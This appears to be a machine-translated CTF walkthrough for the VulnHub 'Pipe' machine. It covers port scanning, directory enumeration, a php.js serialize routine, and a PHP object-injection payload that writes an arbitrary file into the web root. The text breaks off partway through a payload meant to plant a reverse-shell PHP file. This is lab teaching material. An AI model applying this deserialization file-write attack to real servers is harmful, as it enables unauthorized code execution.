How Pipe solves VulnHub challenges

How Pipe solves VulnHub challenges

Today, I will show you how to solve the Pipe challenge in VulnHub.

Of course, CTF is playing with the train of thought. The train of thought in this article is not necessarily the best. You are welcome to download this question at the end of the article!

Enumeration

PORT      STATE SERVICE REASON  VERSION22/tcp    open  ssh     syn-ack OpenSSH 6.7p1 Debian 5 (protocol 2.0)| ssh-hostkey:|   1024 16:48:50:89:e7:c9:1f:90:ff:15:d8:3e:ce:ea:53:8f (DSA)|   2048 ca:f9:85:be:d7:36:47:51:4f:e6:27:84:72:eb:e8:18 (RSA)|_  256 d8:47:a0:87:84:b2:eb:f5:be:fc:1c:f1:c9:7f:e3:52 (ECDSA)80/tcp    open  http    syn-ack Apache httpd| http-auth:| HTTP/1.1 401 Unauthorized|_  Basic realm=index.php|_http-server-header: Apache|_http-title: 401 Unauthorized111/tcp   open  rpcbind syn-ack 2-4 (RPC #100000)| rpcinfo:|   program version   port/proto  service|   100000  2,3,4        111/tcp  rpcbind|   100000  2,3,4        111/udp  rpcbind|   100024  1          42192/udp  status|_  100024  1          47286/tcp  status47286/tcp open  status  syn-ack 1 (RPC #100024)MAC Address: 00:0C:29:05:96:3D (VMware)Device type: general purposeRunning: Linux 3.X|4.XOS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4OS details: Linux 3.2 - 4.0Uptime guess: 199.640 days (since Sat May  9 04:40:31 2015)Network Distance: 1 hopTCP Sequence Prediction: Difficulty=262 (Good luck!)IP ID Sequence Generation: All zerosService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service Enumeration

 

HTTP Enumeration

Run OWASP dirbuster on port 80 to expose the JavaScript and PHP files in/scriptz /.

 

Source code Audit

Php. js Interrogation:

The serial number function is displayed in the source code of js. php. Note the end of this example:

function serialize(mixed_value) {//  discuss at: http://phpjs.org/functions/serialize/// original by: Arpad Ray (mailto:arpad@php.net)// improved by: Dino// improved by: Le Torbi (http://www.letorbi.de/)// improved by: Kevin van Zonneveld (http://kevin.vanzonneveld.net/)// bugfixed by: Andrej Pavlovic// bugfixed by: Garagoth// bugfixed by: Russell Walker (http://www.nbill.co.uk/)// bugfixed by: Jamie Beck (http://www.terabit.ca/)// bugfixed by: Kevin van Zonneveld//  (http://kevin.vanzonneveld.net/)// bugfixed by: Ben (http://benblume.co.uk/)//    input by: DtTvB  (http://dt.in.th/2008-09-16.string-length-in-bytes.h//    input by: Martin (http://www.erlenwiese.de/)//        note: We feel the main purpose of this function should be to ease the transport of data between php & js//        note: Aiming for PHP-compatibility, we have to translate objects to arrays//   example 1: serialize(['Kevin', 'van', 'Zonneveld']);//   returns 1:'a:3:{i:0;s:5:"Kevin";i:1;s:3:"van";i:2;s:9:"Zonneveld";}'//   example 2: serialize({firstName:'Kevin', midName: 'van', surName:'Zonneveld'});//   returns 2: 'a:3:{s:9:"firstName";s:5:"Kevin";s:7:"midName";s:3:"van";s:7:"surName";s:9:"Zonneveld";}'

Log. php. BAK

The source code is audited and found to be serialized using Js files.

 

Burp Suite-POST request

Modify the POST request and submit it to index. php.

 

Then Burp confirmed the serialization object:

 

Decodes a string

 

Select a string and right-click to send it to Decoder

 

Click Smart decode)

Using the previously discovered php. js, it is possible to calculate the serialization mechanism.

Import the new modified string to the burp:

O:3:"Log":2:{s:8:"filename";s:30:"/var/www/html/scriptz/Meh1.txt";s:4:"data";s:12:"HighOnCoffee";}

Use the Burp Decoder URL to encode the preceding string and use the Burp Repeater for injection.

 

The meh.txt File Created by the scriptzdirectory validation contains the HighOnCoffee text.

Reverse Shell Injection

Burp Decoder is used to encode the following string:

O: 3: "Log": 2: {s: 8: "filename"; s: 31: "/var/www/html/scriptz/shell. php "; s: 4:" data "; s: 60 :"